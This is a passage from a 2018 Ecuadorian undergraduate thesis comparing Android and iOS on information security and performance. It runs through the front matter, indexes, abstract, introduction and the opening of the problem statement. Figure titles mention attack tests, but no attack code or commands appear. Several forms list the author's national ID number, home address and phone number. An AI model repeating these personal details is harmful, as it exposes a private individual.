ingeniero en sistemas computacionalesrepositorio.ug.edu.ec/bitstream/redug/28256/1/b-cisc-ptg....

147
UNIVERSIDAD DE GUAYAQUIL FACULTAD DE CIENCIAS MATEMÁTICAS Y FÍSICAS CARRERA DE INGENIERÍA EN SISTEMAS COMPUTACIONALES ANÁLISIS COMPARATIVO EN TÉRMINOS DE SEGURIDAD DE LA INFORMACIÓN Y RENDIMIENTO ENTRE SISTEMAS OPERATIVOS ANDROID E IOS EN TELÉFONOS MÓVILES. PROYECTO DE TITULACIÓN Previa a la obtención del Título de: INGENIERO EN SISTEMAS COMPUTACIONALES AUTORA: RUTH ALEXANDRA ASQUI YÁNEZ TUTORA: ING. KARLA YADIRA ABAD SACOTO, M.Sc. GUAYAQUIL - ECUADOR 2018

Upload: dinhque

Post on 07-Oct-2018

223 views

Category:

Documents


0 download

TRANSCRIPT

UNIVERSIDAD DE GUAYAQUIL

FACULTAD DE CIENCIAS MATEMÁTICAS Y FÍSICAS

CARRERA DE INGENIERÍA EN SISTEMAS

COMPUTACIONALES

ANÁLISIS COMPARATIVO EN TÉRMINOS DE SEGURIDAD

DE LA INFORMACIÓN Y RENDIMIENTO ENTRE

SISTEMAS OPERATIVOS ANDROID E IOS

EN TELÉFONOS MÓVILES.

PROYECTO DE TITULACIÓN

Previa a la obtención del Título de:

INGENIERO EN SISTEMAS COMPUTACIONALES

AUTORA: RUTH ALEXANDRA ASQUI YÁNEZ

TUTORA: ING. KARLA YADIRA ABAD SACOTO, M.Sc.

GUAYAQUIL - ECUADOR

2018

II

REPOSITORIO NACIONAL EN CIENCIAS Y TECNOLOGÍA

FICHA DE REGISTRO DE TESIS

TÍTULO “Análisis comparativo en términos de seguridad de la información y rendimiento entre sistemas operativos Android e iOS en teléfonos móviles”

AUTOR: Ruth Alexandra Asqui Yánez

REVISORES: Ing. Fabricio Felipe Medina Palacios, Mgs.

INSTITUCIÓN: Universidad de Guayaquil

FACULTAD: Ciencias Matemáticas y Físicas

CARRERA: Ingeniería en Sistemas Computacionales

FECHA DE PUBLICACIÓN: N° DE PÁGS.: 147 pág.

ÁREA TEMÁTICA: Investigación y Seguridad en tecnología móvil

PALABRAS CLAVES: Análisis comparativo, seguridad de la información, rendimiento, Android, iOS.

RESUMEN: La elaboración de este proyecto, consiste en realizar un breve análisis de

los problemas que existen en los términos de seguridad de la información y rendimiento en los teléfonos móviles. Esto encaminó a realizar un análisis comparativo en los sistemas operativos móviles que lideran el mercado tecnológico en la actualidad, en los términos mencionados anteriormente. El objetivo principal es brindar una guía de recomendaciones a los usuarios estableciendo los beneficios que ofrecen Android e iOS al momento de adquirir un teléfono móvil. Para el estudio de seguridad de la información y rendimiento se establecieron criterios que validan la evaluación de cada término a estudiar. Para el rendimiento se tomaron en cuenta varias versiones de teléfonos y se eligió la herramienta de medición AnTutu como resultado la investigación de estudios anteriores, se realizaron varias pruebas hasta obtener resultados claros para determinar el mejor sistema operativo mediante la metodología cualitativa, cuantitativa y enfoque de observación. También se realizaron varias pruebas de seguridad de la información para establecer qué tan seguros son los sistemas operativos; mediante ataques informáticos utilizando herramientas de seguridad informática. De acuerdo a los resultados obtenidos en el análisis comparativo se logró establecer una guía de recomendaciones para los usuarios; donde se establecen los beneficios que ofrecen los sistemas operativos móviles con respecto a cada término estudiado.

N° DE REGISTRO: N° DE CLASIFICACIÓN:

DIRECCIÓN URL (tesis en la web):

ADJUNTO PDF X SI NO

CONTACTO CON AUTOR: Ruth Alexandra Asqui Yánez

Teléfono:

0939858299 E-mail: [email protected]

CONTACTO DE LA INSTITUCIÓN

Nombre: Ab. Juan Chávez Atocha

Teléfono: 2307729

III

APROBACIÓN DEL TUTOR

En mi calidad de Tutor del trabajo de investigación, “Análisis comparativo

en términos de seguridad de la información y rendimiento entre sistemas

operativos Android e iOS en teléfonos móviles” elaborado por la Srta. Asqui

Yánez Ruth Alexandra de la Carrera de Ingeniería en Sistemas

Computacionales, Facultad de Ciencias Matemáticas y Físicas de la

Universidad de Guayaquil, previo a la obtención del Título de Ingeniero en

Sistemas Computacionales, me permito declarar que luego de haber

orientado, estudiado y revisado, la Apruebo en todas sus partes.

Atentamente

Ing. Karla Yadira Abad Sacoto, M.Sc.

TUTOR

IV

DEDICATORIA

Este trabajo está dedicado a DIOS

por permitir culminar esta meta y

ayudar a realizar este proyecto, ya

que ha sido el pilar fundamental en

mi vida a pesar de las circunstancias,

siempre estuvo presente.

A mi abuelo ejemplar Luis Asqui, por

estar presente siempre en mi

corazón y recuerdos a pesar de no

estar presente físicamente

A mis padres Blanca Yánez y César

Asqui por regalarme esta gran

herencia, el estudio; ya que siempre

me apoyaron económicamente,

recurso importante que ha servido

para continuar estudiando y llegar a

cumplir esta meta.

V

AGRADECIMIENTO

Agradezco a DIOS, por ayudarme a

realizar este proyecto, gracias a él se

logró realizar este trabajo de

titulación, estuvo presente desde el

inicio hasta el final de este proceso;

siempre brindándome su ayuda.

A mi tutora Ing. Karla Abad, por ser la

guía y ayuda que requiere el

desarrollo de este proyecto.

A mi amiga Briggitte Bravo, por estar

presente de alguna manera durante

el proceso del desarrollo de este

proyecto.

VI

TRIBUNAL DEL PROYECTO DE TITULACIÓN

Ing. Eduardo Santos Baquerizo, M.Sc.

DECANO DE LA FACULTAD CIENCIAS MATEMÁTICAS Y

FÍSICAS

Ing. Abel Alarcón Salvatierra, M.Gs. DIRECTOR DE LA CARRERA DE

INGENIERÍA EN SISTEMAS COMPUTACIONALES

Ing. Karla Abad Sacoto, M.Sc. PROFESOR TUTOR DEL

PROYECTO DE TITULACIÓN

Ing. Fabricio Medina Palacios, Mgs. PROFESOR REVISOR DEL AREA

TRIBUNAL

Ab. Juan Chávez Atocha, Esp SECRETARIO

VII

DECLARACIÓN EXPRESA

“La responsabilidad del contenido

de este Proyecto de Titulación, me

corresponden exclusivamente; y el

patrimonio intelectual de la misma a

la UNIVERSIDAD DE GUAYAQUIL”

ASQUI YÁNEZ RUTH ALEXANDRA

VIII

UNIVERSIDAD DE GUAYAQUIL

FACULTAD DE CIENCIAS MATEMÁTICAS Y FÍSICAS

CARRERA DE INGENIERÍA EN SISTEMAS

COMPUTACIONALES

ANÁLISIS COMPARATIVO EN TÉRMINOS DE SEGURIDAD

DE LA INFORMACIÓN Y RENDIMIENTO ENTRE

SISTEMAS OPERATIVOS ANDROID E IOS

EN TELÉFONOS MÓVILES.

Proyecto de Titulación que se presenta como requisito para optar por el

título de INGENIERO EN SISTEMAS COMPUTACIONALES

:

Autora: ASQUI YÁNEZ RUTH ALEXANDRA

C.I. 0927392415

Tutora: ING. KARLA YADIRA ABAD SACOTO, M.Sc.

Guayaquil, Marzo de 2018

IX

CERTIFICADO DE ACEPTACIÓN DEL TUTOR

En mi calidad de Tutor del Proyecto de Titulación, nombrado por el Consejo

Director de la Facultad de Ciencias Matemáticas y Físicas de la Universidad

de Guayaquil.

CERTIFICO:

Que he analizado el Proyecto de Titulación presentado por ella estudiante

Asqui Yánez Ruth Alexandra, como requisito previo para optar por el título

de Ingeniero en Sistemas Computacionales cuyo problema es:

“Análisis comparativo en términos de seguridad de la información y

rendimiento entre sistemas operativos Android e iOS en teléfonos

móviles”

Considero aprobado el trabajo en su totalidad.

Presentado por:

Asqui Yánez Ruth Alexandra

C.I. 0927392415

Tutora: Ing. Karla Yadira Abad Sacoto, M.Sc.

Guayaquil, Marzo de 2018

X

UNIVERSIDAD DE GUAYAQUIL FACULTAD DE CIENCIAS MATEMÁTICAS Y FÍSICAS

CARRERA DE INGENIERÍA EN SISTEMAS COMPUTACIONALES

Autorización para Publicación de Proyecto de Titulación en

Formato Digital

1. Identificación del Proyecto de Titulación

Nombre Alumno: Asqui Yánez Ruth Alexandra

Dirección: Guayaquil, Sauces III, Mz.30F Villa N° 7

Teléfono: 0939858299 E-mail: [email protected]

Facultad: Ciencias Matemáticas y Físicas

Carrera: Ingeniería en Sistemas Computacionales

Título al que optan: Ingeniero en Sistemas Computacionales

Profesor guía: Ing. Karla Yadira Abad Sacoto, M.Sc.

Título del Proyecto de titulación: Análisis comparativo en términos de seguridad de la información y rendimiento entre sistemas operativos Android e iOS en teléfonos móviles.

Tema del Proyecto de Titulación: Seguridad de la información y

rendimiento en los sistemas operativos móviles Android e iOS

XI

2. Autorización de Publicación de Versión Electrónica del Proyecto de Titulación.

A través de este medio autorizado a la Biblioteca de la Universidad de

Guayaquil y a la Facultad de Ciencias Matemáticas y Físicas a publicar la

versión electrónica de este Proyecto de titulación.

Publicación electrónica:

Firma Alumno: Asqui Yánez Ruth Alexandra

C.I. 0927392415

3. Forma de envío: El texto del proyecto de titulación debe ser enviado en formato Word,

como archivo .Doc O .RTF y Puf para PC. Las imágenes que la

acompañen pueden ser .gif, jpg o .TIFF.

Inmediata X Después de 1 año

DVDROM CDROM X

XII

ÍNDICE GENERAL

APROBACIÓN DEL TUTOR ............................................................................... III

DEDICATORIA ................................................................................................... IV

AGRADECIMIENTO ............................................................................................ V

DECLARACIÓN EXPRESA ............................................................................... VII

CERTIFICADO DE ACEPTACIÓN DEL TUTOR ................................................. IX

Autorización para Publicación de Proyecto de Titulación en Formato Digital ....... X

ÍNDICE DE GRÁFICOS .................................................................................. XVII

ÍNDICE DE CUADROS ..................................................................................... XX

RESUMEN ...................................................................................................... XXII

ABSTRACT. .................................................................................................. XXIII

INTRODUCCIÓN ................................................................................................. 1

CAPITULO I ......................................................................................................... 3

EL PROBLEMA ................................................................................................... 3

PLANTEAMIENTO DEL PROBLEMA .................................................................. 3

Ubicación del problema en un contexto ............................................................ 5

Situación conflicto Nudos críticos ..................................................................... 6

Causas, consecuencias del problema .............................................................. 8

Delimitación del problema ................................................................................ 9

Formulación del Problema ............................................................................... 9

Evaluación del problema. ................................................................................. 9

OBJETIVOS DE LA INVESTIGACIÓN ............................................................... 11

Objetivo general ............................................................................................. 11

Objetivos específicos ..................................................................................... 11

ALCANCES DEL PROBLEMA ........................................................................... 12

JUSTIFICACIÓN E IMPORTANCIA ................................................................... 12

Metodología del proyecto ............................................................................... 13

CAPITULO II ...................................................................................................... 14

MARCO TEÓRICO ............................................................................................ 14

ANTECEDENTES DEL ESTUDIO ..................................................................... 14

FUNDAMENTACIÓN TEÓRICA ........................................................................ 17

Sistema operativo .......................................................................................... 17 Definiciones ................................................................................................ 17

Tipos de sistemas operativos móviles ........................................................ 18

XIII

Conceptos básicos de seguridad ................................................................... 24 Confidencialidad ......................................................................................... 24

Integridad ................................................................................................... 24

Disponibilidad ............................................................................................. 25

Autentificación ............................................................................................ 25

El no repudio .............................................................................................. 25

Dispositivo móvil. ........................................................................................... 25 Tipos de dispositivos móviles. .................................................................... 25

Capas de seguridad en dispositivos móviles............................................... 26

Ataques .......................................................................................................... 26 Ataques y amenazas en Android e iOS ...................................................... 27

FUNDAMENTACIÓN LEGAL ............................................................................. 31

Capítulo tercero “Delitos contra los Derechos del Buen Vivir” ........................ 32 Sección tercera “Delitos contra la seguridad de los activos de los sistemas

de información y comunicación” ................................................................. 32

Capítulo segundo “Delitos contra los Derechos de libertad” ........................... 34 Sección sexta “Delitos contra el derecho a la intimidad personal y familiar” 34

PREGUNTAS CIENTÍFICAS A CONTESTAR ................................................... 35

VARIABLES DE LA INVESTIGACIÓN. .............................................................. 35

DEFINICIONES CONCEPTUALES ................................................................... 35

Seguridad de la información ........................................................................... 35

Seguridad informática .................................................................................... 36

Seguridad ....................................................................................................... 36

Rendimiento ................................................................................................... 36

Datos ............................................................................................................. 36

Información .................................................................................................... 36

Vulnerabilidad ................................................................................................ 37

Amenazas ...................................................................................................... 37

Riesgos .......................................................................................................... 37

Hardware ....................................................................................................... 37

Software ......................................................................................................... 37

Malware ......................................................................................................... 38

Virus ............................................................................................................... 38

Gama alta de teléfonos .................................................................................. 38

XIV

Gama baja de teléfonos ................................................................................. 38

Stand-alone .................................................................................................... 38

Ciberdelincuentes .......................................................................................... 39

CAPÍTULO III ..................................................................................................... 40

Análisis de factibilidad .................................................................................... 40 Factibilidad operativa .................................................................................. 40

Factibilidad técnica ..................................................................................... 41

Factibilidad legal ......................................................................................... 45

Factibilidad económica ............................................................................... 45

METODOLOGÍA DE LA INVESTIGACIÓN ........................................................ 48

DISEÑO DE LA INVESTIGACIÓN ..................................................................... 48

Modalidad de la Investigación ........................................................................ 48

Tipo de investigación...................................................................................... 49 Investigación comparativa .......................................................................... 49

Investigación observacional ........................................................................ 49

Población y muestra ....................................................................................... 49 Población .................................................................................................... 49

Muestra ...................................................................................................... 51

OPERACIONALIZACIÓN DE VARIABLES ........................................................ 53

INSTRUMENTOS DE RECOLECCIÓN DE DATOS .......................................... 56

PROCEDIMIENTOS DE LA INVESTIGACIÓN .................................................. 56

RECOLECCIÓN DE INFORMACIÓN ................................................................ 58

PROCESAMIENTO Y ANÁLISIS ....................................................................... 58

Procesamiento y análisis comparativo en los sistemas operativos móviles .... 58 1. Seleccionar criterios a evaluar, para cada término a comparar ............... 59

2. Seleccionar herramientas para el análisis comparativo de seguridad de la

información y rendimiento. .......................................................................... 60

3. Proceso de evaluación............................................................................ 64

4. Resultados del análisis. .......................................................................... 90

CAPITULO IV .................................................................................................... 98

RESULTADOS, CONCLUSIONES Y RECOMENDACIONES ........................... 98

Resultados ..................................................................................................... 98

Conclusiones ............................................................................................... 100

Recomendaciones ....................................................................................... 101

XV

BIBLIOGRAFÍA ................................................................................................ 102

ANEXOS ......................................................................................................... 107

XVI

ABREVIATURAS Y SIGLAS

Ing. Ingeniero

IDC International Data Corporation

Lab Laboratorio

J2ME Java 2 Micro Edition

Apple All People Promoting Literacy Efforts

UOC Universitat Oberta de Catalunya

SO Sistema operativo

RIM Reaseach In Motion

API Application Programming Interface

SMS Short Message Service

JAVA Just Another Vague Acronym

Mac Macintosh

BSD Berkeley Software Distribution

SDK Software Development Kit

DNS Domain name

SSH Secure SHell

GPS Global Positioning System

COIP Codigo Organico Integral Penal

XVII

ÍNDICE DE GRÁFICOS

GRÁFICO N° 1

ESTADÍSTICA DE CREACIÓN DE MALWARE PARA SISTEMAS ..................... 7

GRÁFICO N° 2

ARQUITECTURA DE ANDROID ....................................................................... 20

GRÁFICO N° 3

ARQUITECTURA DE IOS ................................................................................. 23

GRÁFICO N° 4

SISTEMAS OPERATIVOS DE TELÉFONOS MÓVILES .................................... 50

GRÁFICO N° 5

VERSIONES DE SISTEMA OPERATIVO iOS .................................................. 51

GRÁFICO N° 6

VERSIONES DE SISTEMA OPERATIVO ANDROID ........................................ 52

GRÁFICO N° 7

PROVEEDORES DE DISPOSITIVOS MÓVILES ............................................... 53

GRÁFICO N° 8

REDIRECCIÓN DE HTTP EN ANDROID .......................................................... 65

GRÁFICO N° 9

DENEGACIÓN DE SERVICIO EN ANDROID .................................................... 66

GRÁFICO N° 10

DENEGACIÓN DE SERVICIO EN ANDROID .................................................... 67

GRÁFICO N° 11

PROCESO DE INSERCIÓN DE IMAGEN EN ANDROID .................................. 68

GRÁFICO N° 12

INFORMACIÓN ACCEDIDA EN ANDROID ....................................................... 69

GRÁFICO N° 13

CREACIÓN DE VIRUS PARA ANDROID .......................................................... 70

GRÁFICO N° 14

PROCESO DE INSTALACIÓN DE VIRUS EN ANDROID ................................. 71

GRÁFICO N° 15

COMANDOS DE ACCESO EN ANDROID ......................................................... 72

GRÁFICO N° 16

ENVIO DE MENSAJE A ANDROID ................................................................... 73

XVIII

GRÁFICO N° 17

LISTA DE CONTACTOS DESCARGADOS DE LA VÍCTIMA............................. 74

GRÁFICO N° 18

PANTALLA DE INFORMACIÓN ACCEDIDA DE ANDROID .............................. 75

GRÁFICO N° 19

DENEGACIÓN DE SERVICIO EN iOS .............................................................. 76

GRÁFICO N° 20

PROCESO DE INSERCIÓN DE IMAGEN EN iOS ............................................. 77

GRÁFICO N° 21

INFORMACIÓN ACCEDIDA EN IOS ................................................................. 78

GRÁFICO N° 22

TEST EN ANTUTU - SAMSUNG GALAXY J5 ................................................... 79

GRÁFICO N° 23

DIAGRAMA DE RENDIMIENTO/TIEMPO – SAMSUNG GALAXY J5 ................ 80

GRÁFICO N° 24

TEST EN ANTUTU - IPHONE 5 ........................................................................ 81

GRÁFICO N° 25

DIAGRAMA DE RENDIMIENTO/TIEMPO EN IPHONE 5 .................................. 82

GRÁFICO N° 26

TEST EN ANTUTU - SAMSUNG GALAXY J7 ................................................... 83

GRÁFICO N° 27

DIAGRAMA DE RENDIMIENTO/TIEMPO EN SAMSUNG GALAXY J7 ............. 85

GRÁFICO N° 28

TEST EN ANTUTU – iPHONE 6S ..................................................................... 86

GRÁFICO N° 29

DIAGRAMA DE RENDIMIENTO/TIEMPO – iPHONE 6S ................................... 87

GRÁFICO N° 30

TEST EN ANTUTU – iPHONE 7 ........................................................................ 89

GRÁFICO N° 31

ATAQUES INFORMÁTICOS EXITOSOS EN ANDROID E iOS ......................... 90

GRÁFICO N° 32

ATAQUES INFORMÁTICOS FALLIDOS EN ANDROID E iOS .......................... 91

GRÁFICO N° 33

ANÁLISIS COMPARATIVO ENTRE SAMSUNG GALAXY J5 E iPHONE 5 ....... 92

XIX

GRÁFICO N° 34

ANÁLISIS COMPARATIVO ENTRE SAMSUNG GALAXY J7 E iPHONE 6S ..... 93

GRÁFICO N° 35

ANÁLISIS COMPARATIVO ENTRE SAMSUNG GALAXY S8 E iPHONE 7 ....... 94

XX

ÍNDICE DE CUADROS

CUADRO N° 1

CAUSAS, CONSECUENCIAS DEL PROBLEMA................................................. 8

CUADRO N° 2

DELIMITACIÓN DEL PROBLEMA ....................................................................... 9

CUADRO N° 3

CARACTERÍSTICAS - SAMSUNG GALAXY J5 ................................................ 41

CUADRO N° 4

CARACTERÍSTICAS – IPHONE 5 ..................................................................... 42

CUADRO N° 5

CARACTERÍSTICAS - SAMSUNG GALAXY J7 ................................................ 42

CUADRO N° 6

CARACTERÍSTICAS - IPHONE 6S ................................................................... 43

CUADRO N° 7

CARACTERÍSTICAS – SAMSUNG GALAXY S8 ............................................... 43

CUADRO N° 8

CARACTERÍSTICAS - IPHONE 7..................................................................... 44

CUADRO N° 9

CARACTERÍSTICAS - LAPTOP ........................................................................ 44

CUADRO N° 10

COSTO TOTAL DEL PROYECTO ..................................................................... 45

CUADRO N° 11

OPERACIONALIZACIÓN DE VARIABLES ........................................................ 55

CUADRO N° 12

TÉRMINOS Y CRITERIOS DE ANÁLISIS ......................................................... 59

CUADRO N° 13

TÉRMINOS Y CRITERIOS DE SEGURIDAD DE LA INFORMACIÓN Y

RENDIMIENTO ................................................................................................. 61

CUADRO N° 14

RESULTADOS DE TESTS - SAMSUNG GALAXY J5 ....................................... 80

CUADRO N° 15

RESULTADOS DE TESTS - IPHONE 5 ............................................................ 82

XXI

CUADRO N° 16

RESULTADOS DE TESTS - SAMSUNG GALAXY J7 ....................................... 84

CUADRO N° 17

RESULTADOS DE TESTS - IPHONE 6S .......................................................... 86

CUADRO N° 18

RESULTADOS DE TESTS - SAMSUNG GALAXY S8 ....................................... 88

CUADRO N° 19

RESULTADOS DE TESTS - IPHONE 7 ............................................................ 89

XXII

UNIVERSIDAD DE GUAYAQUIL FACULTAD DE CIENCIAS MATEMÁTICAS Y FÍSICAS

CARRERA DE INGENIERÍA EN SISTEMAS COMPUTACIONALES

ANÁLISIS COMPARATIVO EN TÉRMINOS DE SEGURIDAD DE LA INFORMACIÓN Y RENDIMIENTO ENTRE

SISTEMAS OPERATIVOS ANDROID E IOS EN TELÉFONOS MÓVILES

AUTORA: Ruth Alexandra Asqui Yánez

TUTORA: Ing. Karla Yadira Abad Sacoto, M.Sc.

RESUMEN

La elaboración de este proyecto consiste en realizar un breve análisis de los

problemas que existen en los términos de seguridad de la información y rendimiento

en los teléfonos móviles. Esto encaminó a realizar un análisis comparativo en los

sistemas operativos móviles que lideran el mercado tecnológico en la actualidad, en

los términos mencionados anteriormente. El objetivo principal es brindar una guía de

recomendaciones a los usuarios estableciendo los beneficios que ofrecen Android e

iOS al momento de adquirir un teléfono móvil. Para el estudio de seguridad de la

información y rendimiento se establecieron criterios que validan la evaluación de cada

término a estudiar. Para el rendimiento se tomaron en cuenta varias versiones de

teléfonos y se eligió la herramienta de medición AnTutu como resultado la

investigación de estudios anteriores, se realizaron varias pruebas hasta obtener

resultados claros para determinar el mejor sistema operativo mediante la metodología

cualitativa, cuantitativa y enfoque de observación. También se realizaron varias

pruebas de seguridad de la información para establecer qué tan seguros son los

sistemas operativos; mediante ataques informáticos utilizando herramientas de

seguridad informática. De acuerdo con los resultados obtenidos en el análisis

comparativo se logró establecer una guía de recomendaciones para los usuarios;

donde se establecen los beneficios que ofrecen los sistemas operativos móviles con

respecto a cada término estudiado.

Palabras claves: Análisis comparativo, seguridad de la información, rendimiento,

Android, iOS.

XXIII

UNIVERSIDAD DE GUAYAQUIL FACULTAD DE CIENCIAS MATEMÁTICAS Y FÍSICAS

CARRERA DE INGENIERÍA EN SISTEMAS COMPUTACIONALES

ANÁLISIS COMPARATIVO EN TÉRMINOS DE SEGURIDAD DE LA INFORMACIÓN Y RENDIMIENTO ENTRE

SISTEMAS OPERATIVOS ANDROID E IOS EN TELÉFONOS MÓVILES

AUTORA: Ruth Alexandra Asqui Yánez

TUTOR: Ing. Karla Yadira Abad Sacoto

ABSTRACT.

The elaboration of this project consists in carrying out a brief analysis of the problems

that exist in terms of information security and performance in mobile phones. This led

to a comparative analysis of the mobile operating systems that currently lead the

technology market, in the terms mentioned above. The main objective is to provide a

guide of recommendations to users, establishing the benefits offered by Android and

iOS when purchasing a mobile phone. For the study of information security and

performance, criteria were established that validate the evaluation of each term to be

studied. Several phone versions were taken into account for the performance and the

AnTutu measurement tool was chosen as a result of the research of previous studies,

several tests were carried out until clear results were obtained to determine the best

operating system through the qualitative, quantitative methodology and approach of

observation. Several information security tests were also conducted to establish how

secure the operating systems are; through computer attacks using computer security

tools. According to the results obtained in the comparative analysis, a guide of

recommendations for the users was established; where the benefits offered by mobile

operating systems are established with respect to each term studied

Keywords: Comparative analysis, information security, performance, Android, iOS

1

INTRODUCCIÓN

La investigación empieza debido a que los teléfonos móviles están gobernando

en las personas actualmente, dependiendo cada vez más de estos dispositivos,

ya que facilitan el realizar labores cotidianas y cumplen progresivamente las

propiedades de un computador. Además, las empresas están adoptando cada vez

el uso de esta tecnología en vista de que se puede almacenar información y

actualizar sus servicios al usuario.

Por esta razón surge la presencia de los ciberdelincuentes, quienes ahora están

enfocados en realizar ataques informáticos a los dispositivos móviles inteligentes,

dado que los usuarios tienen información importante, que les sirven a los

atacantes para adquirir dinero fácil e ilegal; atacando y vulnerando a la seguridad

de la información en los sistemas operativos de estos dispositivos.

Pero hay que recalcar que existen quejas regularmente de la seguridad de la

información y rendimiento que brindan los teléfonos inteligentes; esta es la mayor

razón por la que surge la investigación, debido a los problemas expuestos por los

usuarios. Por lo cual se procede a estudiar los dos sistemas operativos móviles

que lideran el mercado de la tecnología, Android e iOS.

El propósito real de la investigación es realizar un análisis comparativo referente

a la seguridad de la información y rendimiento entre Android e iOS y dar a conocer

cuál de los dos sistemas operativos le conviene usar al usuario y futuros usuarios.

Para llevar a cabo la investigación, se emplearán técnicas de estudio que

permitirán realizar el análisis comparativo en términos de seguridad de la

información y rendimiento mediante herramientas de software más utilizadas con

respecto a cada término a estudiar.

En el capítulo uno, se plantea el problema que existe en los usuarios con respecto

a la seguridad de la información y rendimiento entre Android e iOS, la importancia,

los objetivos y los alcances que abarcarán la investigación.

En el capítulo dos, se recopila información teórica importante que sirve para

entender los criterios de seguridad de la información y rendimiento en los sistemas

operativos, antecedentes de estudio que se enfocan al tema planteado y

2

definiciones conceptuales que dejarán en claro los términos empleados en este

trabajo y las leyes que protegen el desarrollo de la investigación.

En el capítulo tres, se detalla la metodología empleada para cumplir los objetivos

de la investigación, el proceso que se llevó a cabo para el análisis comparativo en

cada término estudiado, los resultados evaluados para poder elaborar la guía de

recomendaciones al usuario y por último se encuentra la guía de

recomendaciones que beneficien a los usuarios y futuros usuarios de teléfonos

móviles de Android e iOS.

Finalmente, el capítulo cuatro, es donde se plantean los resultados, conclusiones

del proceso del análisis comparativo entre Android e iOS, dando a conocer que se

cumplieron los objetivos planteados en la investigación realizada; y por último se

emiten recomendaciones para que el estudio realizado pueda ser desarrollado de

otra manera y con diferentes metodologías para verificar si los resultados son los

mismos.

3

CAPITULO I

EL PROBLEMA

PLANTEAMIENTO DEL PROBLEMA

Los primeros teléfonos móviles que salieron al mercado poseían sistemas muy

limitados con funciones básicas de recibir y enviar mensajes y realizar llamadas

telefónicas; aquellos sistemas, debido a sus limitaciones en recursos físicos y

funcionalidades, no son de interés para los atacantes. Los atacantes no se

enfocan en estos teléfonos, porque no son muy usados por los usuarios en la

actualidad y además solo poseen información básica o de bajo interés. (Prieto,

Ramírez, Morillo, & Prieto, 2011)

Por este motivo para el estudio del proyecto se consideraron solo los teléfonos

inteligentes y se dejaron a un lado a los primeros teléfonos móviles ya que no son

de interés para los atacantes.

En la actualidad, por el avance tecnológico en los teléfonos que surge muy a

menudo, las personas, desde los niños hasta los ancianos, poseen como mínimo

un teléfono inteligente con la finalidad de cubrir sus expectativas en la seguridad

de la información y rendimiento; siempre tratan de obtener el último modelo por

las nuevas características que innovan las marcas más vendidas en el mercado

de teléfono como Samsung, iPhone y Hawei.

Según (El Tiempo, 2017) La consultora IDC, señaló que en el primer trimestre del

año 2017, se vendieron 347,4 millones de teléfonos inteligentes, es decir la venta

aumentó un 4,3 por ciento con respeto al mismo período del año pasado.

Además, nos señaló las cinco marcas más vendidas entre enero y marzo del año

2017, las cuales fueron: Samsung, liderando con 79,2 millones, en segundo lugar,

está iPhone con 51,6 millones y en tercer lugar a Huawei con 34,2 millones, luego

Oppo con 25,6 millones y Vivo con 18,1 millones. Así nos damos cuenta de que

Samsung e iPhone son los líderes en la venta de teléfonos móviles. (El Tiempo,

2017)

Debido al uso masivo de teléfonos inteligentes, los usuarios, no le dan la debida

importancia al riesgo que corre su información, por la falta de seguridad que los

4

sistemas no han cubierto por completo; ya que buscan dispositivos que sean

rápidos.

El uso que tiene el teléfono inteligente es masivo, por la ayuda y facilidad que

propone mediante las aplicaciones de su tienda; desde entretenimiento hasta

realizar transacciones bancarias.

Por otra parte, (Rodríguez & Quimí, 2016) “El riesgo de la seguridad, en la red

corporativa, principalmente la amenaza latente de exposición de la información

confidencial en la empresa.”

El riesgo que corren las empresas, en la red corporativa es muy alto debido a que

la información tiene mucho valor, por tal motivo se llevará a cabo el estudio de las

falencias de los dos sistemas Android e iOS.

La tecnología móvil no logra proteger la información almacenada en el sistema

operativo; y los usuarios no aprovechan el rendimiento que brindan las nuevas

versiones que se ofrecen en el mercado de teléfono móvil. A continuación, se

describen criterios que limitan al usuario en la seguridad de la información y

rendimiento en los teléfonos:

✓ Limita elegir un teléfono móvil con el sistema operativo más seguro frente

a los ataques expuestos por el avance de esta tecnología. ‘

✓ Dificulta realizar alguna transacción bancaria en las aplicaciones que

brindan las entidades bancarias en las aplicaciones instaladas en teléfonos

móviles.

✓ Limita el acceso a redes públicas.

✓ Limita alcanzar lo propuesto por un teléfono inteligente ya sea por

hardware y software.

✓ Limita al usuario realizar actividades cotidianas, que se realicen en las

aplicaciones que ofrece cada tienda en los sistemas operativos móviles.

✓ Limita la ejecución de cualquier archivo o imagen multimedia.

✓ Limita la función correcta del sistema por sobrecarga de información en el

mismo tiempo.

5

Ubicación del problema en un contexto

La tecnología de teléfonos está presente en todo el mundo por la popularidad en

su mercado, por lo que cualquier usuario o empresa está expuesto a algún ataque

de seguridad en su información.

Según Gartner (2017) señaló que en el cuarto trimestre del año 2016, los sistemas

operativos de teléfonos inteligentes más vendidos a nivel mundial en el mercado

fueron: Android e iOS, con un 99.6 %. Android liderando con un 81.7 %, seguido

de iOS con un 17.9 % y otros con solo un 0.4 %.

¿Android e iOS?

Es la pregunta que se hacen los usuarios que usan éstas plataformas de celulares

más populares, después de los últimos meses del 2015, los dos sistemas

operativos en cuanto a la seguridad fue comprometida de una forma importante

(BBC, 2015). Es decir, los usuarios están con la interrogante de qué sistema

operativo utilizar, porque la seguridad en los dos sistemas operativos ha sido

comprometida a ataques.

“Los dos sistemas operativos, iOS y Android, tienen puntos fuertes y débiles.

Dependiendo del uso que des al celular, te resultará más seguro uno o el otro.”

(BBC, 2015)

Según BBC (2015): “La respuesta no es rotunda. Ambos tienen ventajas e

inconvenientes, según muestra un reciente informe comparativo realizado por la

compañía de seguridad y antivirus Panda Security.”

Al ser éstos los sistemas operativos mayormente utilizados, existen más ataques

para ambos en cuanto a la seguridad de la información como en rendimiento.

La mayoría de los ataques vulneran los sistemas operativos e incluso existen virus

que atacan el rendimiento del dispositivo a pesar de ser de gama alta.

Los usuarios tienen falta de conocimiento en el funcionamiento correcto del

software en los teléfonos inteligentes, no pueden aprovechar el rendimiento

completo que ofrece la plataforma que poseen entre sus manos.

6

Situación conflicto Nudos críticos

En el mundo se escucha o lee a menudo noticias de usuarios que son víctimas de

robo de información por los ciberdelincuentes, mediante ataques informáticos

afectando a personas y empresas que poseen dispositivos móviles; y también

criterios no motivados sobre el rendimiento de los teléfonos, por falta de

conocimiento que no permiten explotar al máximo los sistemas operativos en los

teléfonos inteligentes.

Existen muchos artículos de estudios realizados de seguridad en teléfonos

móviles de usuarios, que han sido víctimas de robo de información, en el capítulo

2 en la sección de Antecedentes en el artículo (Seguridad en dispositivos móviles

con sistemas operativos Android y iOS) se especifica un caso de estudio realizado

por (Albarracín, Camargo, & Parra, 2013) en la ciudad de Tunja - Colombia.

La falta de seguridad en los sistemas operativos ocurre porque los innovadores

de la tecnología móvil no alcanzan a cubrir todos los pilares fundamentales de

seguridad de la información, esto se da porque mientras más avanza la tecnología

en Smartphones los ciberdelincuentes también innovan para atacar el mercado de

